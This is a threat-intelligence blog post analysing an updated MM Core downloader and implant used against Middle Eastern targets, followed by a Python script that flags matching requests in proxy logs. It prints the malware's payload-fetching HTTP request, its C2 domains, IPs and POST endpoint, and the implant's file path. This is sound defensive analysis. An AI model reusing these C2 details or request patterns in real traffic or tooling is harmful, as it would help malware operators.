Attackers Exhibit ‘StrangeLove’ for Middle Eastern Targets


02 July 2013

On 25 June 2013, Context detected and analysed a malicious downloader in the same family as the one previously responsible for deploying the ‘MM Core’ implant - malware that FireEye first made public in their article Trojan.APT.BaneChant[1]. Context’s Threat Intelligence analysts found that the secondary payload, Trojan:W32/MMCore, has been updated, likely in response to the exposure of BaneChant.

This version, labelled ‘2.1-LNK’, tags the egressed communications with ‘StrangeLove’, as opposed to the previously identified ‘2.0-LNK’ version, which used ‘BaneChant’. Perhaps this tag is also a reference to music on a movie soundtrack - in this case Tim Burton’s ‘Frankenweenie’ - or maybe to the cult classic film ‘Dr. Strangelove’.

One notable difference is that the downloader (first stage) now expects binary data that begins with a JFIF header, 20 bytes that were missing from the previous incarnation. The downloaded data is obfuscated using the ‘Shikata ga nai’ encoder[2], likely in an effort to avoid detection by anti-virus products.

Similar to the downloaders used to deploy BaneChant and its predecessors, this latest downloader connects to a domain that redirects via an HTTP 302 response to another that houses the second stage implant.  In this case the outgoing request takes the form:

GET /images/banners/foo.jpg HTTP/1.1
Accept: images/jpeg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2)
Host: pingr.redirectme.net

with the subsequent redirection to www.solidsec.net:80.

At the time of analysis, pingr.redirectme.net resolved to 8.23.224.90 (as do many domains provided by noip.com), with www.solidsec.net resolving to 46.4.5.25.

The functionality of MM Core remains the same, with only minor changes. Specifically, the temporary file created for ‘download and execute’ commands uses a prefix string of ‘jv’ instead of ‘java’, and the path to the implant is now:
C:\ProgramData\NVidia\Helpers\NVGraphics.exe

In this instance, outgoing communication of MM Core is via HTTP POSTs to:
www.solidsec.net/images/banners/adio.php

and uses the MIME multipart message boundary:
-------------------1f8b7ft4h3tb78kc219b61891mfb74nhfgjh3
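
The two network indicators above (the downloader’s request headers and the MM Core POST boundary) can be turned into simple proxy-log matching. The following is an added example written for this post, not Context’s or FireEye’s own tooling; it assumes the boundary appears in a standard Content-Type header, which the post does not state, and the sample requests are constructed.

```python
from typing import Dict, List

# Indicators quoted in the post. The boundary and the malformed "images/jpeg"
# Accept value (a real browser sends "image/jpeg") are the strongest signals;
# the User-Agent alone is far too common to alert on by itself.
MMCORE_BOUNDARY = "-------------------1f8b7ft4h3tb78kc219b61891mfb74nhfgjh3"
DOWNLOADER_ACCEPT = "images/jpeg"
DOWNLOADER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2)"

def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request head into method, path and a lowercase header map."""
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, **headers}

def classify(raw: str) -> List[str]:
    """Return the list of indicators from the post that a captured request matches."""
    req = parse_request(raw)
    hits = []
    if req["method"] == "GET" and req.get("accept") == DOWNLOADER_ACCEPT:
        hits.append("downloader-accept")   # malformed MIME type, not image/jpeg
    if req.get("user-agent") == DOWNLOADER_UA:
        hits.append("downloader-ua")
    # Assumption: the boundary is carried in a multipart Content-Type header.
    if req["method"] == "POST" and MMCORE_BOUNDARY in req.get("content-type", ""):
        hits.append("mmcore-boundary")
    return hits

# Constructed sample traffic: the request shown in the post, a POST carrying
# the MM Core boundary, and a benign browser request that must stay clean.
SAMPLES = [
    "GET /images/banners/foo.jpg HTTP/1.1\r\nAccept: images/jpeg\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2)\r\n"
    "Host: pingr.redirectme.net\r\n",
    "POST /images/banners/adio.php HTTP/1.1\r\nHost: www.solidsec.net\r\n"
    "Content-Type: multipart/form-data; boundary=" + MMCORE_BOUNDARY + "\r\n",
    "GET /index.html HTTP/1.1\r\nAccept: image/jpeg\r\n"
    "User-Agent: Mozilla/5.0\r\nHost: example.com\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(raw.splitlines()[0], "->", classify(raw) or ["clean"])
```
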
Context has been tracking this adversary since December 2012 and will shortly release more details on infrastructure and attribution.


[1] http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html

[2] http://en.wikipedia.org/wiki/Shikata_ga_nai
